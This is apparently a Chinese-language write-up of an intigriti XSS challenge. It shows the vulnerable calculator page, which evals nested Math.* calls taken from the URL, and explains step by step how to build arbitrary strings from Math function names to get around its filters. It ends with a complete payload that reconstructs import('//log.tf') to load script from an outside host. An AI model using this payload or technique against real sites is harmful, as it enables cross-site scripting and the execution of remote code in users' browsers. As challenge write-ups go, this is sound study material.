<body> <main> <h1>Pure Functional Math Calculator</h1> <div class="container"> <div class="wrapper"> <div class="result"></div>
<div class="pad"> <div class="row"> <button class="btn-ac">AC</button> </div>
<div class="row"> <button class="btn-fn">sin</button> <button class="btn-fn">cos</button> <button class="btn-fn">tan</button> <button class="btn-fn">floor</button> </div>
<div class="row"> <button class="btn-fn">acos</button> <button class="btn-fn">asin</button> <button class="btn-fn">atan</button> <button class="btn-fn">ceil</button> </div>
<div class="row"> <button class="btn-fn">cosh</button> <button class="btn-fn">sinh</button> <button class="btn-fn">tanh</button> <button class="btn-fn">round</button> </div>
<div class="row"> <button class="btn-share">share</button> <button class="btn-equal">=</button> </div>
</div> </div> <div class="stack-block"> </div> </div> </main> <script> (function(){ name = 'Pure Functional Math Calculator' let next Math.random = function () { if (!this.seeds) { this.seeds = [0.62536, 0.458483, 0.544523, 0.323421, 0.775465] next = this.seeds[new Date().getTime() % this.seeds.length] } next = next * 1103515245 + 12345 return (next / 65536) % 32767 } console.assert(Math.random() > 0)
const result = document.querySelector('.result') const stack = document.querySelector('.stack-block') let operators = []
document.querySelector('.pad').addEventListener('click', handleClick)
let qs = new URLSearchParams(window.location.search) if (qs.get('q')) { const ops = qs.get('q').split(',') if (ops.length >= 100) { alert('Max length of array is 99, got:' + ops.length) return init() }
for(let op of ops) { if (!op.startsWith('Math.')) { alert(`Operator should start with Math.: ${op}`) return init() }
if (!/^[a-zA-Z0-9.]+$/.test(op)) { alert(`Invalid operator: ${op}`) return init() } }
for(let op of ops) { addOperator(op) }
calculateResult() } else { init() }
function init() { addOperator('Math.random') }
function addOperator(name) { result.innerText = `${name}(${result.innerText})` operators.push(name)
let div = document.createElement('div') div.textContent = `${operators.length}. ${name}` stack.prepend(div) }
function calculateResult() { result.innerText = eval(result.innerText) }
function handleClick(e) { let className = e.target.className let text = e.target.innerText
if (className === 'btn-fn') { addOperator(`Math.${text}`) } else if (className === 'btn-ac') { result.innerText = 'Math.random()'; stack.innerHTML = '<div>1. Math.random</div>' operators = ['Math.random'] } else if (className === 'btn-share'){ alert('Please copy the URL!') location.search = '?q=' + operators.join(',') } else if (className === 'btn-equal') { calculateResult() } } })()</script> </body></html>


页面逻辑比较简单,主要思路是跟进到 URL参数 q 的限制逻辑

let qs = new URLSearchParams(window.location.search)if (qs.get('q')) {...}


  • 经 , 拆分出来的数组长度最长为 100

  • 所有拆分出来的字符串(即数组长度要以Math.作为开头

  • 所有拆分出来的字符串只能以 a-zA-Z0-9. 字符组合而成


当满足了这三个限制,最先进入 addOperator 方法:

function addOperator(name) {  result.innerText = `${name}(${result.innerText})`  operators.push(name)
let div = document.createElement('div') div.textContent = `${operators.length}. ${name}` stack.prepend(div)}

这里逻辑为将我们传入的Math.xxx以嵌套的方式 塞到result.innerText中

关于 result 的定义,在之前的代码中已经明确

const result = document.querySelector('.result')

document.querySelector('.result').innerText 中,也就是说:我们传入的q参数,最终将以下列方式进行输出



接着进入 calculateResult 方法:

function calculateResult() {  result.innerText = eval(result.innerText)}


这里用到了 result.innerText,即上一个方法中传递的 Math.xxx(Math.xxx(Math.xxx()))。到这里,执行形式已经明了:



如果直接使用某种方法,使 Math.xxx(Math.xxx(Math.xxx()))返回字符串是肯定执行不了的。只会返回相关的 String,效果约等同于 x=1;eval("x") 得到 1


Math.random = function () {  if (!this.seeds) {    this.seeds = [0.62536, 0.458483, 0.544523, 0.323421, 0.775465]    next = this.seeds[new Date().getTime() % this.seeds.length]  }  next = next * 1103515245 + 12345  return (next / 65536) % 32767}

这里可以看到使用this.seeds(this即为Math对象) 为Math中创建一个Arrayseeds



  • eval(1)

  • eval(2)

  • eval(...)


所以 Math.constructor.constructor() 等同于 Function()等同于function anonymous(){}

再组合上 Array.map 可以实现可控内容执行

搞定了执行环境,接下来就是熟悉的拼接字符串的环节,如何在只用一个括号的方式进行拼接字符串呢?我最开始想到的是 String.prototype.concat()方法,即通过




一开始我是想通过某个不为人知的方法来对属性进行修改,但翻了两天MDN Web Docs除了发现Function.prototype.bind可以将某方法需要的多个参数分多次传递外,并无其他有价值的发现。走过这么多弯路后,回顾页面时我发现我要的可控变量Math.seeds不就明晃晃的在这里放着吗?!


[0.62536, 0.458483, 0.544523, 0.323421, 0.775465]


  1. 清空数组Math.seeds

  2. 利用Array.prototype.push,添加数字 4 与 1,因为push过后会默认返回数组的长度,且括号内步先于括号外执行,故得到Math.seeds['4', 1]

  3. 利用Array.prototype.join(/*空*/)Math.seeds转换为41,之后将String.fromCharCode(41) 得到的结果)pushMath.seeds

  4. 最后擦屁股,把 '4'1清除掉


还记得吗?页面源码中有这么一句ops.length >= 100,也就是说:我们传递进来的值总个数不能大于100。那么在以上得到了一个括号的情况下,我们共使用了多少个呢?答案是:5+3+4+2=14








共计5位就得到了一个字符!也就是说,使用尽可能短的payload例如长度为17的import(/\xss.hk/) 17*5+5+2=92共计92位就可以实现!!!!也就是说这条路行得通!把payload转换为10进制



// import('//log.tf') 方法// 共计 82 个// 最后push需要反过来push// 执行Math.seeds.map(Math.constructor.constructor())// 格式化成字符串Math.seeds.join(Math.random.name.toString())// 清空列表Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop()))))// 字符 imMath.seeds.push(Math.exp.name.constructor.prototype.trim.name.slice(Math.constructor.is.name.length.toLocaleString()))// 字符 pMath.seeds.push(Math.seeds.constructor.prototype.pop.name.slice(Math.constructor.is.name.length.toLocaleString()))// 字符 orMath.seeds.push(Math.floor.name.slice(Math.exp.name.length.toLocaleString()))// 字符 tMath.seeds.push(Math.hypot.name.slice(Math.acos.name.length.toLocaleString()))// 字符 ( 40Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log2(Math.seeds.constructor.isPrototypeOf.name.length.toString()))))// 字符 ' 39Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.log(Math.expm1(Math.log(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))))))// 字符 / 47Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))))))// 字符 / 47Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))))))// 字符 logMath.seeds.push(Math.log.name.toLocaleString())// 字符 . 46Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))))// 字符 tMath.seeds.push(Math.hypot.name.slice(Math.acos.name.length.toLocaleString()))// 字符 fMath.seeds.push(Math.seeds.constructor.of.name.slice(Math.constructor.length.toLocaleString()))// 字符 ' 39Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.log(Math.expm1(Math.log(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))))))// 字符 )Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))


// 82位Math.seeds.map(Math.constructor.constructor(Math.seeds.join(Math.random.name.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.log(Math.expm1(Math.log(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.seeds.constructor.of.name.slice(Math.constructor.length.toLocaleString(Math.seeds.push(Math.hypot.name.slice(Math.acos.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.log.name.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.log(Math.expm1(Math.log(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log2(Math.seeds.constructor.isPrototypeOf.name.length.toLocaleString(Math.seeds.push(Math.hypot.name.slice(Math.acos.name.length.toLocaleString(Math.seeds.push(Math.floor.name.slice(Math.exp.name.length.toLocaleString(Math.seeds.push(Math.seeds.constructor.prototype.pop.name.slice(Math.constructor.is.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.prototype.trim.name.slice(Math.constructor.is.name.length.toLocaleString(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop())))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))



最后的最后~ 再次感谢intigriti与huli(@aszx87410)带来的题目!


文章来源: https://mp.weixin.qq.com/s?__biz=MzIxMDYyNTk3Nw==&mid=2247514544&idx=1&sn=f62a1cfacbe3659e48523daf825f0148&chksm=97634d66a014c470203637d93fef35ba1103a43a5782c61e79ffc9e61d33b3c2f6f8cdd6d591&scene=58&subscene=0#rd